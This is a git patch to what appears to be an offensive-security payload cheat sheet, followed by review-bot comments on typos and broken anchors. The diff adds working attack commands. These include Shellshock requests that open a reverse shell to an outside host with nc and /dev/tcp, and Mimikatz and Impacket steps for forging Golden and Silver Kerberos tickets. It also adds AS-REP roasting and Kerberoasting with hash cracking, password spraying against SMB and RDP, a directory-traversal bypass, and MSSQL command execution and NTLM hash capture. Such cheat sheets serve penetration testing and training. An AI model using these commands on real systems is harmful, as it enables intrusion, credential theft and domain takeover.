From 8dffb59ac51effed3a964aa5050476bf124af6c8 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 18 Aug 2019 22:24:48 +0200 Subject: [PATCH] Pspy + Silver Ticket + MSSQL connect --- CVE Exploits/README.md | 5 +- Directory Traversal/README.md | 9 ++ File Inclusion/README.md | 2 +- .../Active Directory Attack.md | 112 ++++++++++++------ .../Linux - Privilege Escalation.md | 8 ++ .../Windows - Persistence.md | 13 ++ .../Windows - Privilege Escalation.md | 2 + SQL Injection/MSSQL Injection.md | 33 +++++- SQL Injection/README.md | 1 + 9 files changed, 141 insertions(+), 44 deletions(-) diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md index 41b223c..8563a19 100644 --- a/CVE Exploits/README.md +++ b/CVE Exploits/README.md @@ -10,8 +10,9 @@ The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptograph Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system. -```bash -echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n +```powershell +echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\r\n" +curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi" ``` ## CVE-2017-5638 - Apache Struts 2 diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index cedc13c..1420178 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md 
@@ -9,11 +9,13 @@ * [16 bits Unicode encoding](#) * [UTF-8 Unicode encoding](#) * [Bypass "../" replaced by ""](#) + * [Bypass "../" with ";"](#) * [Double URL encoding](#) * [UNC Bypass](#unc-bypass) * [Path Traversal](#path-traversal) * [Interesting Linux files](#) * [Interesting Windows files](#) +* [References](#references) ## Tools @@ -62,6 +64,13 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings ...\.\ ``` +### Bypass "../" with ";" + +```powershell +..;/ +http://domain.tld/page.jsp?include=..;/..;/sensitive.txt +``` + ### Double URL encoding ```powershell diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 255a83d..29fbf59 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -46,7 +46,7 @@ http://example.com/index.php?page=../../../etc/passwd ### Null byte -:warning: In versions of PHP below 5.3 we can terminate with null byte. +:warning: In versions of PHP below 5.3.4 we can terminate with null byte. ```powershell http://example.com/index.php?page=../../../etc/passwd%00 diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 91056a7..0ee7408 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -9,8 +9,8 @@ * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol) * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit) * [Password in AD User comment](#password-in-ad-user-comment) - * [Golden Tickets](#passtheticket-golden-tickets) - * [Silver Tickets](#passtheticket-silver-tickets) + * [Pass-the-Ticket Golden Tickets](#passtheticket-golden-tickets) + * [Pass-the-Ticket Silver Tickets](#passtheticket-silver-tickets) * [Kerberoast](#kerberoast) * [KRB_AS_REP roasting](#krb_as_rep-roasting) * [Pass-the-Hash](#pass-the-hash) 
@@ -393,31 +393,33 @@ or dump the Active Directory and `grep` the content. ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ ``` -### PassTheTicket Golden Tickets +### Pass-the-Ticket Golden Tickets -Forging a TGT require the krbtgt key +Forging a TGT require the krbtgt NTLM hash -Mimikatz version +> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt ntlm hash must be used. + +#### Using Mimikatz ```powershell -Get info - Mimikatz +# Get info - Mimikatz lsadump::dcsync /user:krbtgt lsadump::lsa /inject /name:krbtgt -Forge a Golden ticket - Mimikatz +# Forge a Golden ticket - Mimikatz kerberos::purge kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt kerberos::tgt ``` -Meterpreter version +#### Using Meterpreter ```powershell -Get info - Meterpreter(kiwi) +# Get info - Meterpreter(kiwi) dcsync_ntlm krbtgt dcsync krbtgt -Forge a Golden ticket - Meterpreter +# Forge a Golden ticket - Meterpreter load kiwi golden_ticket_create -d -k -s -u -t golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck 
@@ -426,40 +428,51 @@ kerberos_ticket_use /root/Downloads/pentestlabuser.tck kerberos_ticket_list ``` -Using a ticket on Linux +#### Using a ticket on Linux ```powershell -Convert the ticket kirbi to ccache with kekeo +# Convert the ticket kirbi to ccache with kekeo misc::convert ccache ticket.kirbi -Alternatively you can use ticketer from Impacket +# Alternatively you can use ticketer from Impacket ./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519 ./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519 - export KRB5CCNAME=/home/user/ticket.ccache cat $KRB5CCNAME - -NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file +# NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` -### PassTheTicket Silver Tickets +If you need to swap ticket between Windows and Linux, you need to convert them with `ticket_converter` or `kekeo`. 
+ +```powershell +root@kali:ticket_converter$ python ticket_converter.py velociraptor.ccache velociraptor.kirbi +Converting ccache => kirbi +root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi velociraptor.ccache +Converting kirbi => ccache +``` + +### Pass-the-Ticket Silver Tickets Forging a TGS require machine accound password (key) from the KDC ```powershell -Create a ticket for the service -kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE -/kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt +# Create a ticket for the service +mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE -Then use the same steps as a Golden ticket -misc::convert ccache ticket.kirbi -export KRB5CCNAME=/home/user/ticket.ccache -./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 +# Examples +mimikatz $ /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt +mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park + +# Then use the same steps as a Golden ticket +mimikatz $ misc::convert ccache ticket.kirbi + +root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache +root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` ### Kerberoast 
@@ -483,7 +496,7 @@ $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c1 Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus) ```powershell -.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD +.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt ``` Then crack the ticket with hashcat or john @@ -499,7 +512,7 @@ If a domain user does not have Kerberos preauthentication enabled, an AS-REP can ```powershell C:\>git clone https://github.com/GhostPack/Rubeus#asreproast -C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user +C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast ______ _ (_____ \ | | @@ -527,6 +540,19 @@ v1.3.4 [*] AS-REP hash: $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)... + +C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast +``` + +Using `impacket` to get the hash and `hashcat` to crack it. + +```powershell +# extract hashes +root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast +root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast + +# crack AS_REP messages +root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt ``` ### Pass-the-Hash @@ -565,22 +591,30 @@ sekurlsa::pth /user: /domain: /ntlm:.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt +C:\Users\triceratops>.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd +``` + ### Capturing and cracking NTLMv2 hashes If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. 
@@ -817,26 +851,29 @@ Password spraying refers to the attack method that takes a large number of usern > The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates. -Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. +#### Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. + +> Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771). ```powershell root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 +root@kali:~$ python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt ``` -Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. +#### Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. ```powershell crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` ``` -Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services. +#### Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services. ```powershell python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP] ``` -Using [hydra]() and [ncrack]() to target RDP services. +#### Using [hydra]() and [ncrack]() to target RDP services. ```powershell hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10 
@@ -950,4 +987,5 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/) * [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) -* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) \ No newline at end of file +* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) +* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 7b14c77..e01d4be 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -213,6 +213,14 @@ cat /etc/cron.allow cat /etc/cron.deny* ``` +You can use [pspy](https://github.com/DominicBreuker/pspy) to detect a CRON job. + +```powershell +# print both commands and file system events and scan procfs every 1000 ms (=1sec) +./pspy64 -pf -i 1000 +``` + + ## Systemd timers ```powershell diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 4873b3d..d8fa2cd 100644 --- a/Methodology and Resources/Windows - Persistence.md 
+++ b/Methodology and Resources/Windows - Persistence.md @@ -1,5 +1,18 @@ # Windows - Persistence +## Summary + +* [Userland](#userland) + * [Registry](#registry) + * [Startup](#startup) + * [Scheduled Task](#scheduled-task) +* [Elevated](#elevated) + * [HKLM](#hklm) + * [Services](#services) + * [Scheduled Task](#scheduled-task) +* [References](#references) + + ## Userland ### Registry diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 12f24dc..e093f98 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -424,6 +424,7 @@ Scheduled tasks ```powershell schtasks /query /fo LIST 2>nul | findstr TaskName +schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State ``` @@ -698,6 +699,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n ### Juicy Potato (abusing the golden privileges) Binary available at : https://github.com/ohpe/juicy-potato/releases +:warning: Juicy Potato doesn't work in Windows Server 2019. 1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 0061bad..fa30aa6 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md 
@@ -1,5 +1,23 @@ # MSSQL Injection +## Summary + +* [MSSQL comments](#mssql-comments) +* [MSSQL version](#mssql-version) +* [MSSQL database name](#mssql-database-name) +* [MSSQL List databases](#mssql-list-database) +* [MSSQL List columns](#mssql-list-columns) +* [MSSQL List tables](#mssql-list-tables) +* [MSSQL Extract user/password](#mssql-extract-user-password) +* [MSSQL Union Based](#mssql-union-based) +* [MSSQL Error Based](#mssql-error-based) +* [MSSQL Blind Based](#mssql-blind-based) +* [MSSQL Time Based](#mssql-time-based) +* [MSSQL Stacked query](#mssql-stack-query) +* [MSSQL Command execution](#mssql-command-execution) +* [MSSQL UNC path](#mssql-unc-path) +* [MSSQL Make user DBA](#mssql-make-user-dba) + ## MSSQL comments ```sql @@ -19,14 +37,14 @@ SELECT @@version SELECT DB_NAME() ``` -## MSSQL List Databases +## MSSQL List databases ```sql SELECT name FROM master..sysdatabases; SELECT DB_NAME(N); — for N = 0, 1, 2, … ``` -## MSSQL List Column +## MSSQL List columns ```sql SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only @@ -35,7 +53,7 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master. SELECT table_catalog, column_name FROM information_schema.columns ``` -## MSSQL List Tables +## MSSQL List tables ```sql SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views @@ -45,7 +63,7 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master. SELECT table_catalog, table_name FROM information_schema.columns ``` -## MSSQL User Password +## MSSQL Extract user/password ```sql MSSQL 2000: 
@@ -137,6 +155,13 @@ EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; ``` +To interact with the MSSQL instance. + +```powershell +sqsh -S 192.168.1.X -U sa -P superPassword +python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758 +``` + ## MSSQL UNC Path MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash. diff --git a/SQL Injection/README.md b/SQL Injection/README.md index e238323..8099f6d 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -52,6 +52,7 @@ Simple characters %3B ) Wildcard (*) +' # required for XML content ``` Multiple encoding
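Review bot: In the Shellshock block of CVE Exploits/README.md the fence tag is changed from `bash` to `powershell`, yet both lines are a Unix shell command line (`echo -e`, `curl`); the rest of the repo uses `powershell` fences for shell snippets too, but this hunk actively regresses a correctly tagged block, so keep `bash` here. The added closing quote fixes the previously unterminated `echo -e "HEAD /cgi-bin/status ..."` string, but that line still only prints the crafted request, so a short comment marking it as a template of the malicious User-Agent header would stop readers from confusing it with the working `curl` line below it.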
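Review bot: The new TOC entry `* [Bypass "../" with ";"](#)` in Directory Traversal/README.md has an empty anchor, while the neighbouring `#unc-bypass` and `#path-traversal` entries are real links; use the generated slug or drop the `(#)` placeholders consistently across the list. The section body gives only the payload `..;/` and a sample URL with no explanation of the server-side behaviour it depends on, so a reader cannot tell which stacks are affected or how to check their own; one sentence on the precondition, plus a pointer in the References section the TOC now advertises, would make the entry usable.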
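Review bot: Renaming the headings to `### Pass-the-Ticket Golden Tickets` and `### Pass-the-Ticket Silver Tickets` (hunk at line 393) changes their GitHub slugs to `#pass-the-ticket-golden-tickets` and `#pass-the-ticket-silver-tickets`, but the TOC hunk at line 9 only changes the link text and keeps the old targets `#passtheticket-golden-tickets` and `#passtheticket-silver-tickets`, so both summary links now point at nothing. Update the anchors in the same change as the headings.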
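Review bot: `Forging a TGT require the krbtgt NTLM hash` should read `requires`, and the new blockquote about `ticketer.py` and the krbtgt hash is quoted without attribution; the Kerberos (II) tarlogic article added to the References in this same patch looks like its origin, so link it inline the way the Kerberoast section links Rubeus. In the Meterpreter block the template line `golden_ticket_create -d -k -s -u -t` lists bare flags with no placeholders and reads as a broken command next to the fully filled example on the next line; either give placeholder values (`-d <domain> -k <krbtgt-hash> -s <domain-sid> -u <user> -t <file>`) or remove it.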
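Review bot: In the Silver Ticket examples the second mimikatz line keeps a stray leading slash (`mimikatz $ /kerberos::golden /domain:adsec.local ...`), which is not a valid mimikatz command; drop the `/` while converting the line. The context line `Forging a TGS require machine accound password (key) from the KDC` is in this hunk and is misleading as well as misspelled: the command itself shows the key is `/rc4:TARGET-MACHINE-NT-HASH`, i.e. the target service or machine account's hash, not anything obtained from the KDC, so `Forging a TGS requires the target machine account's password hash (key)` would match the example. The new sentence `If you need to swap ticket between Windows and Linux` should read `tickets`, and `ticket_converter` is named without a link although `kekeo` and Impacket are linked elsewhere in the file.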
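Review bot: The AS-REP roasting example now requests hashcat output (`Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast`) but the appended cracking step is `C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast`, with a prompt that implies john running from the Rubeus directory on Windows; the tool chain is inconsistent. Either crack the Rubeus output with hashcat, as the new impacket block correctly does with `-m 18200`, or request john's output format for that file. Note also that the sample output left in the block (`$krb5asrep$TestOU3user@testlab.local:858B6F...`) predates the `/format:hashcat` change and lacks the `$23$` etype marker that mode 18200 expects, so the shown file would not be accepted by the hashcat command below it; regenerate the sample or trim it.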
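Review bot: The headings introduced in the password spraying hunk are full sentences with trailing periods (`#### Using kerbrute, a tool to perform Kerberos pre-auth bruteforcing.`, `#### Using hydra and ncrack to target RDP services.`), which produce unwieldy anchors and do not match the short headings used elsewhere in the file; use `#### kerbrute`, `#### crackmapexec`, `#### RDPassSpray`, `#### hydra and ncrack` and move the descriptions into the paragraph. `[hydra]()` and `[ncrack]()` still carry empty link targets in the new heading line. The added blockquote that pre-authentication failures are logged as event 4771 rather than 4625 is the one detection-relevant statement in this patch; give it a source, and it would help defenders to spell out the consequence, namely that spraying attempts against Kerberos pre-auth will not appear in the usual 4625 searches and that 4771 on the domain controllers must be monitored as well.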
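Review bot: The References hunk still ends with `\ No newline at end of file`; add the trailing newline so the next appended reference does not again show as a two-line diff for a one-line change. The author casing `ELOY PÉREZ` also differs from every other entry in the list (`Elad Shami`, `harmj0y`), so `Eloy Pérez` would be consistent.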
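Review bot: The pspy addition in Linux - Privilege Escalation.md says `to detect a CRON job` without saying what pspy adds over the `cat /etc/cron*` commands just above it, namely that it observes processes and file-system events without root, which is what makes it useful when the crontabs are unreadable; one sentence on that would justify the section. The comment `scan procfs every 1000 ms (=1sec)` accurately describes `-i 1000`, but it is worth adding that a one-second polling interval can miss short-lived commands, which is why the `-f` file-system events flag is combined with it. Also the block leaves two blank lines before `## Systemd timers` where the file otherwise uses one.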
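Review bot: The new Summary in Windows - Persistence.md links `[Scheduled Task](#scheduled-task)` under both Userland and Elevated, but two headings with the same text get distinct GitHub slugs (`#scheduled-task` and `#scheduled-task-1`), so the Elevated entry resolves to the Userland section. Use `#scheduled-task-1` for the second entry, or rename the headings so the two sections are distinguishable.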
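Review bot: The added line `schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM` writes to `schtasks.txt` but reads `schtask.txt`, so the pipeline fails as written. It also chains a cmd tool with `cat` and `grep`, which are not present on a stock Windows host, and uses `;` as a command separator, so it only works from PowerShell with GNU tools installed; the preceding line already shows the native pattern with `findstr`, so a `findstr` or `Select-String` version would fit the file and run everywhere.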
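Review bot: `:warning: Juicy Potato doesn't work in Windows Server 2019.` gives neither a reason nor a source, and is placed between the download link and the numbered steps where it breaks the flow; move it to a short note above the steps and add the reference explaining the change that blocks the technique, so readers can judge which of their own versions are affected rather than taking one product name on faith.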
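Review bot: Several new Summary anchors in MSSQL Injection.md do not match the headings in the same file: `[MSSQL List databases](#mssql-list-database)` is missing the final `s` (the heading renamed in this patch is `## MSSQL List databases`, slug `#mssql-list-databases`), and `[MSSQL Extract user/password](#mssql-extract-user-password)` will not resolve because GitHub removes the `/` rather than turning it into a hyphen, giving `#mssql-extract-userpassword`. `[MSSQL Stacked query](#mssql-stack-query)` also looks suspect given the link text; check it against the actual heading.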
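Review bot: `To interact with the MSSQL instance.` is a sentence fragment; `Connecting to the MSSQL instance from Linux:` reads as intended. In the second example `192.168.1X` is missing a dot (`192.168.1.X`, as on the `sqsh` line). Both examples also place the password on the command line (`-P superPassword`, `Administrator:password@`), which lands in shell history and is readable by other local users in the process list; a one-line comment pointing that out, or showing the interactive password prompt, would keep readers from copying the pattern into real environments.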
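Review bot: The new list item `' # required for XML content` in SQL Injection/README.md does not say what is required or in which situation, and in a list headed `Simple characters` the `#` can be read as part of the payload rather than as a comment. Spell out the intent in prose under the list (which XML context, and why the single quote matters there) instead of a trailing comment.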